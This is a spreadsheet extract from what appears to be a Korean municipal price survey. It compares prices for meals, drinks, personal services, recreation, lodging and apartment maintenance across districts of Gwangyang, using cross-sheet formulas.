A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 5 | E39: 5 | F39: 13,400 | G39: 13,400 | H39: 0 | I39: 0 | J39: =광양읍1!F39 -> 13,500 | K39: =광양읍1!G39 -> 13,500 | L39: 0 | M39: =광양읍2!F39 -> 12,000 | N39: =광양읍2!G39 -> 12,000 | O39: 0 | P39: =중마동1!F39 -> 13,500 | Q39: =중마동1!G39 -> 13,500 | R39: 0 | S39: =중마동2!F39 -> 14,500 | T39: =중마동2!G39 -> 14,500 | U39: 0 | V39: =광영동!F39 -> 13,500 | W39: =광영동!G39 -> 13,500 | X39: 0 | Y39: =옥곡면!F39 -> 0 | Z39: =옥곡면!G39 -> 0 | AA39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 5 | E40: 5 | F40: 14,400 | G40: 14,400 | H40: 0 | I40: 0 | J40: =광양읍1!F40 -> 13,500 | K40: =광양읍1!G40 -> 13,500 | L40: 0 | M40: =광양읍2!F40 -> 13,500 | N40: =광양읍2!G40 -> 13,500 | O40: 0 | P40: =중마동1!F40 -> 15,000 | Q40: =중마동1!G40 -> 15,000 | R40: 0 | S40: =중마동2!F40 -> 15,500 | T40: =중마동2!G40 -> 15,500 | U40: 0 | V40: =광영동!F40 -> 14,500 | W40: =광영동!G40 -> 14,500 | X40: 0 | Y40: =옥곡면!F40 -> 0 | Z40: =옥곡면!G40 -> 0 | AA40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 6 | E41: 6 | F41: 7,542 | G41: 7,542 | H41: 0 | I41: 0 | J41: =광양읍1!F41 -> 7,750 | K41: =광양읍1!G41 -> 7,750 | L41: 0 | M41: =광양읍2!F41 -> 8,000 | N41: =광양읍2!G41 -> 8,000 | O41: 0 | P41: =중마동1!F41 -> 8,500 | Q41: =중마동1!G41 -> 8,500 | R41: 0 | S41: =중마동2!F41 -> 8,000 | T41: =중마동2!G41 -> 8,000 | U41: 0 | V41: =광영동!F41 -> 8,500 | W41: =광영동!G41 -> 8,500 | X41: 0 | Y41: =옥곡면!F41 -> 4,500 | Z41: =옥곡면!G41 -> 4,500 | AA41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 6 | E42: 6 | F42: 7,792 | G42: 7,792 | H42: 0 | I42: 0 | J42: =광양읍1!F42 -> 7,750 | K42: =광양읍1!G42 -> 7,750 | L42: 0 | M42: =광양읍2!F42 -> 8,500 | N42: =광양읍2!G42 -> 8,500 | O42: 0 | P42: =중마동1!F42 -> 9,500 | Q42: =중마동1!G42 -> 9,500 | R42: 0 | S42: =중마동2!F42 -> 8,000 | T42: =중마동2!G42 -> 8,000 | U42: 0 | V42: =광영동!F42 -> 8,500 | W42: =광영동!G42 -> 8,500 | X42: 0 | Y42: =옥곡면!F42 -> 4,500 | Z42: =옥곡면!G42 -> 4,500 | AA42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 5 | E43: 5 | F43: 23,544 | G43: 23,811 | H43: 267 | I43: 0 | J43: =광양읍1!F43 -> 29,222 | K43: =광양읍1!G43 -> 30,555 | L43: 0 | M43: =광양읍2!F43 -> 27,000 | N43: =광양읍2!G43 -> 27,000 | O43: 0 | P43: =중마동1!F43 -> 21,500 | Q43: =중마동1!G43 -> 21,500 | R43: 0 | S43: =중마동2!F43 -> 23,500 | T43: =중마동2!G43 -> 23,500 | U43: 0 | V43: =광영동!F43 -> 16,500 | W43: =광영동!G43 -> 16,500 | X43: 0 | Y43: =옥곡면!F43 -> 0 | Z43: =옥곡면!G43 -> 0 | AA43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 5 | E44: 5 | F44: 42,584 | G44: 42,584 | H44: 0 | I44: 0 | J44: =광양읍1!F44 -> 42,000 | K44: =광양읍1!G44 -> 42,000 | L44: 0 | M44: =광양읍2!F44 -> 46,000 | N44: =광양읍2!G44 -> 46,000 | O44: 0 | P44: =중마동1!F44 -> 38,000 | Q44: =중마동1!G44 -> 38,000 | R44: 0 | S44: =중마동2!F44 -> 40,000 | T44: =중마동2!G44 -> 40,000 | U44: 0 | V44: =광영동!F44 -> 46,920 | W44: =광영동!G44 -> 46,920 | X44: 0 | Y44: =옥곡면!F44 -> 0 | Z44: =옥곡면!G44 -> 0 | AA44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 5 | E45: 5 | F45: 15,980 | G45: 15,980 | H45: 0 | I45: 0 | J45: =광양읍1!F45 -> 17,000 | K45: =광양읍1!G45 -> 17,000 | L45: 0 | M45: =광양읍2!F45 -> 17,000 | N45: =광양읍2!G45 -> 17,000 | O45: 0 | P45: =중마동1!F45 -> 15,500 | Q45: =중마동1!G45 -> 15,500 | R45: 0 | S45: =중마동2!F45 -> 17,500 | T45: =중마동2!G45 -> 17,500 | U45: 0 | V45: =광영동!F45 -> 12,900 | W45: =광영동!G45 -> 12,900 | X45: 0 | Y45: =옥곡면!F45 -> 0 | Z45: =옥곡면!G45 -> 0 | AA45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 6 | E46: 6 | F46: 18,583 | G46: 18,583 | H46: 0 | I46: 0 | J46: =광양읍1!F46 -> 18,500 | K46: =광양읍1!G46 -> 18,500 | L46: 0 | M46: =광양읍2!F46 -> 19,000 | N46: =광양읍2!G46 -> 19,000 | O46: 0 | P46: =중마동1!F46 -> 18,500 | Q46: =중마동1!G46 -> 18,500 | R46: 0 | S46: =중마동2!F46 -> 20,000 | T46: =중마동2!G46 -> 20,000 | U46: 0 | V46: =광영동!F46 -> 18,000 | W46: =광영동!G46 -> 18,000 | X46: 0 | Y46: =옥곡면!F46 -> 17,500 | Z46: =옥곡면!G46 -> 17,500 | AA46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 5 | E47: 5 | F47: 7,550 | G47: 7,550 | H47: 0 | I47: 0 | J47: =광양읍1!F47 -> 7,500 | K47: =광양읍1!G47 -> 7,500 | L47: 0 | M47: =광양읍2!F47 -> 7,250 | N47: =광양읍2!G47 -> 7,250 | O47: 0 | P47: =중마동1!F47 -> 8,000 | Q47: =중마동1!G47 -> 8,000 | R47: 0 | S47: =중마동2!F47 -> 8,000 | T47: =중마동2!G47 -> 8,000 | U47: 0 | V47: =광영동!F47 -> 7,000 | W47: =광영동!G47 -> 7,000 | X47: 0 | Y47: =옥곡면!F47 -> 0 | Z47: =옥곡면!G47 -> 0 | AA47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 5 | E48: 5 | F48: 4,080 | G48: 4,080 | H48: 0 | I48: 0 | J48: =광양읍1!F48 -> 4,250 | K48: =광양읍1!G48 -> 4,250 | L48: 0 | M48: =광양읍2!F48 -> 4,000 | N48: =광양읍2!G48 -> 4,000 | O48: 0 | P48: =중마동1!F48 -> 3,650 | Q48: =중마동1!G48 -> 3,650 | R48: 0 | S48: =중마동2!F48 -> 4,500 | T48: =중마동2!G48 -> 4,500 | U48: 0 | V48: =광영동!F48 -> 4,000 | W48: =광영동!G48 -> 4,000 | X48: 0 | Y48: =옥곡면!F48 -> 0 | Z48: =옥곡면!G48 -> 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 5 | E49: 5 | F49: 3,500 | G49: 3,500 | H49: 0 | I49: 0 | J49: =광양읍1!F49 -> 3,000 | K49: =광양읍1!G49 -> 3,000 | L49: 0 | M49: =광양읍2!F49 -> 3,250 | N49: =광양읍2!G49 -> 3,250 | O49: 0 | P49: =중마동1!F49 -> 3,750 | Q49: =중마동1!G49 -> 3,750 | R49: 0 | S49: =중마동2!F49 -> 3,750 | T49: =중마동2!G49 -> 3,750 | U49: 0 | V49: =광영동!F49 -> 3,750 | W49: =광영동!G49 -> 3,750 | X49: 0 | Y49: =옥곡면!F49 -> 0 | Z49: =옥곡면!G49 -> 0 | AA49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 6 | E50: 6 | F50: 6,242 | G50: 6,242 | H50: 0 | I50: 0 | J50: =광양읍1!F50 -> 6,000 | K50: =광양읍1!G50 -> 6,000 | L50: 0 | M50: =광양읍2!F50 -> 6,000 | N50: =광양읍2!G50 -> 6,000 | O50: 0 | P50: =중마동1!F50 -> 7,000 | Q50: =중마동1!G50 -> 7,000 | R50: 0 | S50: =중마동2!F50 -> 5,450 | T50: =중마동2!G50 -> 5,450 | U50: 0 | V50: =광영동!F50 -> 6,000 | W50: =광영동!G50 -> 6,000 | X50: 0 | Y50: =옥곡면!F50 -> 7,000 | Z50: =옥곡면!G50 -> 7,000 | AA50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 6 | E51: 6 | F51: 8,242 | G51: 8,242 | H51: 0 | I51: 0 | J51: =광양읍1!F51 -> 8,000 | K51: =광양읍1!G51 -> 8,000 | L51: 0 | M51: =광양읍2!F51 -> 8,000 | N51: =광양읍2!G51 -> 8,000 | O51: 0 | P51: =중마동1!F51 -> 9,000 | Q51: =중마동1!G51 -> 9,000 | R51: 0 | S51: =중마동2!F51 -> 6,950 | T51: =중마동2!G51 -> 6,950 | U51: 0 | V51: =광영동!F51 -> 8,000 | W51: =광영동!G51 -> 8,000 | X51: 0 | Y51: =옥곡면!F51 -> 9,500 | Z51: =옥곡면!G51 -> 9,500 | AA51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 6 | E52: 6 | F52: 21,250 | G52: 21,250 | H52: 0 | I52: 0 | J52: =광양읍1!F52 -> 21,000 | K52: =광양읍1!G52 -> 21,000 | L52: 0 | M52: =광양읍2!F52 -> 27,000 | N52: =광양읍2!G52 -> 27,000 | O52: 0 | P52: =중마동1!F52 -> 21,500 | Q52: =중마동1!G52 -> 21,500 | R52: 0 | S52: =중마동2!F52 -> 19,000 | T52: =중마동2!G52 -> 19,000 | U52: 0 | V52: =광영동!F52 -> 17,500 | W52: =광영동!G52 -> 17,500 | X52: 0 | Y52: =옥곡면!F52 -> 21,500 | Z52: =옥곡면!G52 -> 21,500 | AA52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 5 | E53: 5 | F53: 8,790 | G53: 8,790 | H53: 0 | I53: 0 | J53: =광양읍1!F53 -> 9,000 | K53: =광양읍1!G53 -> 9,000 | L53: 0 | M53: =광양읍2!F53 -> 10,000 | N53: =광양읍2!G53 -> 10,000 | O53: 0 | P53: =중마동1!F53 -> 9,750 | Q53: =중마동1!G53 -> 9,750 | R53: 0 | S53: =중마동2!F53 -> 7,950 | T53: =중마동2!G53 -> 7,950 | U53: 0 | V53: =광영동!F53 -> 7,250 | W53: =광영동!G53 -> 7,250 | X53: 0 | Y53: =옥곡면!F53 -> 0 | Z53: =옥곡면!G53 -> 0 | AA53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 5 | E54: 5 | F54: 3,640 | G54: 3,640 | H54: 0 | I54: 0 | J54: =광양읍1!F54 -> 3,550 | K54: =광양읍1!G54 -> 3,550 | L54: 0 | M54: =광양읍2!F54 -> 4,100 | N54: =광양읍2!G54 -> 4,100 | O54: 0 | P54: =중마동1!F54 -> 3,150 | Q54: =중마동1!G54 -> 3,150 | R54: 0 | S54: =중마동2!F54 -> 3,900 | T54: =중마동2!G54 -> 3,900 | U54: 0 | V54: =광영동!F54 -> 3,500 | W54: =광영동!G54 -> 3,500 | X54: 0 | Y54: =옥곡면!F54 -> 0 | Z54: =옥곡면!G54 -> 0 | AA54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 5 | E55: 5 | F55: 16,280 | G55: 16,280 | H55: 0 | I55: 0 | J55: =광양읍1!F55 -> 18,400 | K55: =광양읍1!G55 -> 18,400 | L55: 0 | M55: =광양읍2!F55 -> 13,900 | N55: =광양읍2!G55 -> 13,900 | O55: 0 | P55: =중마동1!F55 -> 18,950 | Q55: =중마동1!G55 -> 18,950 | R55: 0 | S55: =중마동2!F55 -> 18,200 | T55: =중마동2!G55 -> 18,200 | U55: 0 | V55: =광영동!F55 -> 11,950 | W55: =광영동!G55 -> 11,950 | X55: 0 | Y55: =옥곡면!F55 -> 0 | Z55: =옥곡면!G55 -> 0 | AA55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 6 | E56: 6 | F56: 3,250 | G56: 3,250 | H56: 0 | I56: 0 | J56: =광양읍1!F56 -> 3,000 | K56: =광양읍1!G56 -> 3,000 | L56: 0 | M56: =광양읍2!F56 -> 3,150 | N56: =광양읍2!G56 -> 3,150 | O56: 0 | P56: =중마동1!F56 -> 3,250 | Q56: =중마동1!G56 -> 3,250 | R56: 0 | S56: =중마동2!F56 -> 3,850 | T56: =중마동2!G56 -> 3,850 | U56: 0 | V56: =광영동!F56 -> 3,250 | W56: =광영동!G56 -> 3,250 | X56: 0 | Y56: =옥곡면!F56 -> 3,000 | Z56: =옥곡면!G56 -> 3,000 | AA56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 6 | E57: 6 | F57: 3,650 | G57: 3,650 | H57: 0 | I57: 0 | J57: =광양읍1!F57 -> 3,900 | K57: =광양읍1!G57 -> 3,900 | L57: 0 | M57: =광양읍2!F57 -> 4,500 | N57: =광양읍2!G57 -> 4,500 | O57: 0 | P57: =중마동1!F57 -> 3,400 | Q57: =중마동1!G57 -> 3,400 | R57: 0 | S57: =중마동2!F57 -> 3,200 | T57: =중마동2!G57 -> 3,200 | U57: 0 | V57: =광영동!F57 -> 3,250 | W57: =광영동!G57 -> 3,250 | X57: 0 | Y57: =옥곡면!F57 -> 3,650 | Z57: =옥곡면!G57 -> 3,650 | AA57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 6 | E58: 6 | F58: 15,211 | G58: 15,211 | H58: 0 | I58: 0 | J58: =광양읍1!F58 -> 15,250 | K58: =광양읍1!G58 -> 15,250 | L58: 0 | M58: =광양읍2!F58 -> 15,300 | N58: =광양읍2!G58 -> 15,300 | O58: 0 | P58: =중마동1!F58 -> 15,500 | Q58: =중마동1!G58 -> 15,500 | R58: 0 | S58: =중마동2!F58 -> 15,717 | T58: =중마동2!G58 -> 15,717 | U58: 0 | V58: =광영동!F58 -> 13,500 | W58: =광영동!G58 -> 13,500 | X58: 0 | Y58: =옥곡면!F58 -> 16,000 | Z58: =옥곡면!G58 -> 16,000 | AA58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 5 | E59: 5 | F59: 12,800 | G59: 12,800 | H59: 0 | I59: 0 | J59: =광양읍1!F59 -> 14,500 | K59: =광양읍1!G59 -> 14,500 | L59: 0 | M59: =광양읍2!F59 -> 13,000 | N59: =광양읍2!G59 -> 13,000 | O59: 0 | P59: =중마동1!F59 -> 11,500 | Q59: =중마동1!G59 -> 11,500 | R59: 0 | S59: =중마동2!F59 -> 11,500 | T59: =중마동2!G59 -> 11,500 | U59: 0 | V59: =광영동!F59 -> 13,500 | W59: =광영동!G59 -> 13,500 | X59: 0 | Y59: =옥곡면!F59 -> 0 | Z59: =옥곡면!G59 -> 0 | AA59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 3 | E60: 3 | F60: 39,308 | G60: 39,308 | H60: 0 | I60: 0 | J60: =광양읍1!F60 -> 0 | K60: =광양읍1!G60 -> 0 | L60: 0 | M60: =광양읍2!F60 -> 44,925 | N60: =광양읍2!G60 -> 44,925 | O60: 0 | P60: =중마동1!F60 -> 41,000 | Q60: =중마동1!G60 -> 41,000 | R60: 0 | S60: =중마동2!F60 -> 0 | T60: =중마동2!G60 -> 0 | U60: 0 | V60: =광영동!F60 -> 32,000 | W60: =광영동!G60 -> 32,000 | X60: 0 | Y60: =옥곡면!F60 -> 0 | Z60: =옥곡면!G60 -> 0 | AA60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 6 | E61: 6 | F61: 3,525 | G61: 3,525 | H61: 0 | I61: 0 | J61: =광양읍1!F61 -> 4,000 | K61: =광양읍1!G61 -> 4,000 | L61: 0 | M61: =광양읍2!F61 -> 4,000 | N61: =광양읍2!G61 -> 4,000 | O61: 0 | P61: =중마동1!F61 -> 3,750 | Q61: =중마동1!G61 -> 3,750 | R61: 0 | S61: =중마동2!F61 -> 3,750 | T61: =중마동2!G61 -> 3,750 | U61: 0 | V61: =광영동!F61 -> 3,900 | W61: =광영동!G61 -> 3,900 | X61: 0 | Y61: =옥곡면!F61 -> 1,750 | Z61: =옥곡면!G61 -> 1,750 | AA61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 6 | E62: 6 | F62: 55,096 | G62: 52,430 | H62: -2,667 | I62: 0 | J62: =광양읍1!F62 -> 52,000 | K62: =광양읍1!G62 -> 36,000 | L62: 0 | M62: =광양읍2!F62 -> 51,770 | N62: =광양읍2!G62 -> 51,770 | O62: 0 | P62: =중마동1!F62 -> 60,000 | Q62: =중마동1!G62 -> 60,000 | R62: 0 | S62: =중마동2!F62 -> 71,130 | T62: =중마동2!G62 -> 71,130 | U62: 0 | V62: =광영동!F62 -> 54,500 | W62: =광영동!G62 -> 54,500 | X62: 0 | Y62: =옥곡면!F62 -> 41,177 | Z62: =옥곡면!G62 -> 41,177 | AA62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 6 | E63: 6 | F63: 8,833 | G63: 8,917 | H63: 83 | I63: 0 | J63: =광양읍1!F63 -> 8,000 | K63: =광양읍1!G63 -> 8,500 | L63: 0 | M63: =광양읍2!F63 -> 8,000 | N63: =광양읍2!G63 -> 8,000 | O63: 0 | P63: =중마동1!F63 -> 10,000 | Q63: =중마동1!G63 -> 10,000 | R63: 0 | S63: =중마동2!F63 -> 9,000 | T63: =중마동2!G63 -> 9,000 | U63: 0 | V63: =광영동!F63 -> 12,000 | W63: =광영동!G63 -> 12,000 | X63: 0 | Y63: =옥곡면!F63 -> 6,000 | Z63: =옥곡면!G63 -> 6,000 | AA63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 5 | E64: 5 | F64: 5,200 | G64: 5,300 | H64: 100 | I64: 0 | J64: =광양읍1!F64 -> 4,500 | K64: =광양읍1!G64 -> 5,000 | L64: 0 | M64: =광양읍2!F64 -> 5,000 | N64: =광양읍2!G64 -> 5,000 | O64: 0 | P64: =중마동1!F64 -> 6,000 | Q64: =중마동1!G64 -> 6,000 | R64: 0 | S64: =중마동2!F64 -> 4,500 | T64: =중마동2!G64 -> 4,500 | U64: 0 | V64: =광영동!F64 -> 6,000 | W64: =광영동!G64 -> 6,000 | X64: 0 | Y64: =옥곡면!F64 -> 0 | Z64: =옥곡면!G64 -> 0 | AA64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 1 | E65: 1 | F65: 13,000 | G65: 13,000 | H65: 0 | I65: 0 | J65: =광양읍1!F65 -> 13,000 | K65: =광양읍1!G65 -> 13,000 | L65: 0 | M65: =광양읍2!F65 -> 0 | N65: =광양읍2!G65 -> 0 | O65: 0 | P65: =중마동1!F65 -> 0 | Q65: =중마동1!G65 -> 0 | R65: 0 | S65: =중마동2!F65 -> 0 | T65: =중마동2!G65 -> 0 | U65: 0 | V65: =광영동!F65 -> 0 | W65: =광영동!G65 -> 0 | X65: 0 | Y65: =옥곡면!F65 -> 0 | Z65: =옥곡면!G65 -> 0 | AA65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | I66: 0 | J66: =광양읍1!F66 -> 0 | K66: =광양읍1!G66 -> 0 | L66: 0 | M66: =광양읍2!F66 -> 0 | N66: =광양읍2!G66 -> 0 | O66: 0 | P66: =중마동1!F66 -> 0 | Q66: =중마동1!G66 -> 0 | R66: 0 | S66: =중마동2!F66 -> 0 | T66: =중마동2!G66 -> 0 | U66: 0 | V66: =광영동!F66 -> 0 | W66: =광영동!G66 -> 0 | X66: 0 | Y66: =옥곡면!F66 -> 0 | Z66: =옥곡면!G66 -> 0 | AA66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 1 | E67: 1 | F67: 3,500 | G67: 3,500 | H67: 0 | I67: 0 | J67: =광양읍1!F67 -> 3,500 | K67: =광양읍1!G67 -> 3,500 | L67: 0 | M67: =광양읍2!F67 -> 0 | N67: =광양읍2!G67 -> 0 | O67: 0 | P67: =중마동1!F67 -> 0 | Q67: =중마동1!G67 -> 0 | R67: 0 | S67: =중마동2!F67 -> 0 | T67: =중마동2!G67 -> 0 | U67: 0 | V67: =광영동!F67 -> 0 | W67: =광영동!G67 -> 0 | X67: 0 | Y67: =옥곡면!F67 -> 0 | Z67: =옥곡면!G67 -> 0 | AA67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 3 | E68: 3 | F68: 3,333 | G68: 3,333 | H68: 0 | I68: 0 | J68: =광양읍1!F68 -> 4,000 | K68: =광양읍1!G68 -> 4,000 | L68: 0 | M68: =광양읍2!F68 -> 2,000 | N68: =광양읍2!G68 -> 2,000 | O68: 0 | P68: =중마동1!F68 -> 0 | Q68: =중마동1!G68 -> 0 | R68: 0 | S68: =중마동2!F68 -> 4,000 | T68: =중마동2!G68 -> 4,000 | U68: 0 | V68: =광영동!F68 -> 0 | W68: =광영동!G68 -> 0 | X68: 0 | Y68: =옥곡면!F68 -> 0 | Z68: =옥곡면!G68 -> 0 | AA68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 5 | E69: 5 | F69: 139,500 | G69: 139,500 | H69: 0 | I69: 0 | J69: =광양읍1!F69 -> 100,000 | K69: =광양읍1!G69 -> 100,000 | L69: 0 | M69: =광양읍2!F69 -> 75,000 | N69: =광양읍2!G69 -> 75,000 | O69: 0 | P69: =중마동1!F69 -> 147,500 | Q69: =중마동1!G69 -> 147,500 | S69: =중마동2!F69 -> 225,000 | T69: =중마동2!G69 -> 225,000 | U69: 0 | V69: =광영동!F69 -> 150,000 | W69: =광영동!G69 -> 150,000 | X69: 0 | Y69: =옥곡면!F69 -> 0 | Z69: =옥곡면!G69 -> 0 | AA69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 6 | E70: 6 | F70: 22,083 | G70: 22,083 | H70: 0 | I70: 0 | J70: =광양읍1!F70 -> 25,000 | K70: =광양읍1!G70 -> 25,000 | L70: 0 | M70: =광양읍2!F70 -> 25,000 | N70: =광양읍2!G70 -> 25,000 | O70: 0 | P70: =중마동1!F70 -> 25,000 | Q70: =중마동1!G70 -> 25,000 | R70: 0 | S70: =중마동2!F70 -> 20,000 | T70: =중마동2!G70 -> 20,000 | U70: 0 | V70: =광영동!F70 -> 25,000 | W70: =광영동!G70 -> 25,000 | X70: 0 | Y70: =옥곡면!F70 -> 12,500 | Z70: =옥곡면!G70 -> 12,500 | AA70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 5 | E71: 5 | F71: 10,060 | G71: 10,060 | H71: 0 | I71: 0 | J71: =광양읍1!F71 -> 9,000 | K71: =광양읍1!G71 -> 9,000 | L71: 0 | M71: =광양읍2!F71 -> 10,900 | N71: =광양읍2!G71 -> 10,900 | O71: 0 | P71: =중마동1!F71 -> 10,400 | Q71: =중마동1!G71 -> 10,400 | R71: 0 | S71: =중마동2!F71 -> 10,000 | T71: =중마동2!G71 -> 10,000 | U71: 0 | V71: =광영동!F71 -> 10,000 | W71: =광영동!G71 -> 10,000 | X71: 0 | Y71: =옥곡면!F71 -> 0 | Z71: =옥곡면!G71 -> 0 | AA71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 5 | E72: 5 | F72: 19,100 | G72: 19,100 | H72: 0 | I72: 0 | J72: =광양읍1!F72 -> 22,500 | K72: =광양읍1!G72 -> 22,500 | L72: 0 | M72: =광양읍2!F72 -> 18,500 | N72: =광양읍2!G72 -> 18,500 | O72: 0 | P72: =중마동1!F72 -> 19,000 | Q72: =중마동1!G72 -> 19,000 | R72: 0 | S72: =중마동2!F72 -> 19,000 | T72: =중마동2!G72 -> 19,000 | U72: 0 | V72: =광영동!F72 -> 16,500 | W72: =광영동!G72 -> 16,500 | X72: 0 | Y72: =옥곡면!F72 -> 0 | Z72: =옥곡면!G72 -> 0 | AA72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 5 | E73: 5 | F73: 830 | G73: 830 | H73: 0 | I73: 0 | J73: =광양읍1!F73 -> 400 | K73: =광양읍1!G73 -> 400 | L73: 0 | M73: =광양읍2!F73 -> 400 | N73: =광양읍2!G73 -> 400 | O73: 0 | P73: =중마동1!F73 -> 450 | Q73: =중마동1!G73 -> 450 | R73: 0 | S73: =중마동2!F73 -> 400 | T73: =중마동2!G73 -> 400 | U73: 0 | V73: =광영동!F73 -> 2,500 | W73: =광영동!G73 -> 2,500 | X73: 0 | Y73: =옥곡면!F73 -> 0 | Z73: =옥곡면!G73 -> 0 | AA73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | I74: 0 | J74: =광양읍1!F74 -> 0 | K74: =광양읍1!G74 -> 0 | L74: 0 | M74: =광양읍2!F74 -> 0 | N74: =광양읍2!G74 -> 0 | O74: 0 | P74: =중마동1!F74 -> 0 | Q74: =중마동1!G74 -> 0 | R74: 0 | S74: =중마동2!F74 -> 0 | T74: =중마동2!G74 -> 0 | U74: 0 | V74: =광영동!F74 -> 0 | W74: =광영동!G74 -> 0 | X74: 0 | Y74: =옥곡면!F74 -> 0 | Z74: =옥곡면!G74 -> 0 | AA74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 6 | E75: 6 | F75: 15,000 | G75: 15,000 | H75: 0 | I75: 0 | J75: =광양읍1!F75 -> 15,000 | K75: =광양읍1!G75 -> 15,000 | L75: 0 | M75: =광양읍2!F75 -> 14,500 | N75: =광양읍2!G75 -> 14,500 | O75: 0 | P75: =중마동1!F75 -> 18,000 | Q75: =중마동1!G75 -> 18,000 | R75: 0 | S75: =중마동2!F75 -> 12,500 | T75: =중마동2!G75 -> 12,500 | U75: 0 | V75: =광영동!F75 -> 18,000 | W75: =광영동!G75 -> 18,000 | X75: 0 | Y75: =옥곡면!F75 -> 12,000 | Z75: =옥곡면!G75 -> 12,000 | AA75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 6 | E76: 6 | F76: 40,417 | G76: 40,417 | H76: 0 | I76: 0 | J76: =광양읍1!F76 -> 45,000 | K76: =광양읍1!G76 -> 45,000 | L76: 0 | M76: =광양읍2!F76 -> 32,500 | N76: =광양읍2!G76 -> 32,500 | O76: 0 | P76: =중마동1!F76 -> 42,500 | Q76: =중마동1!G76 -> 42,500 | R76: 0 | S76: =중마동2!F76 -> 32,500 | T76: =중마동2!G76 -> 32,500 | U76: 0 | V76: =광영동!F76 -> 40,000 | W76: =광영동!G76 -> 40,000 | X76: 0 | Y76: =옥곡면!F76 -> 50,000 | Z76: =옥곡면!G76 -> 50,000 | AA76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 6 | E77: 6 | F77: 6,625 | G77: 6,625 | H77: 0 | I77: 0 | J77: =광양읍1!F77 -> 7,000 | K77: =광양읍1!G77 -> 7,000 | L77: 0 | M77: =광양읍2!F77 -> 8,000 | N77: =광양읍2!G77 -> 8,000 | O77: 0 | P77: =중마동1!F77 -> 8,000 | Q77: =중마동1!G77 -> 8,000 | R77: 0 | S77: =중마동2!F77 -> 8,000 | T77: =중마동2!G77 -> 8,000 | U77: 0 | V77: =광영동!F77 -> 8,250 | W77: =광영동!G77 -> 8,250 | X77: 0 | Y77: =옥곡면!F77 -> 500 | Z77: =옥곡면!G77 -> 500 | AA77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 2 | E78: 2 | F78: 55,000 | G78: 55,000 | H78: 0 | I78: 0 | J78: =광양읍1!F78 -> 0 | K78: =광양읍1!G78 -> 0 | L78: 0 | M78: =광양읍2!F78 -> 0 | N78: =광양읍2!G78 -> 0 | O78: 0 | P78: =중마동1!F78 -> 90,000 | Q78: =중마동1!G78 -> 90,000 | R78: 0 | S78: =중마동2!F78 -> 0 | T78: =중마동2!G78 -> 0 | U78: 0 | V78: =광영동!F78 -> 0 | W78: =광영동!G78 -> 0 | X78: 0 | Y78: =옥곡면!F78 -> 20,000 | Z78: =옥곡면!G78 -> 20,000 | AA78: 0
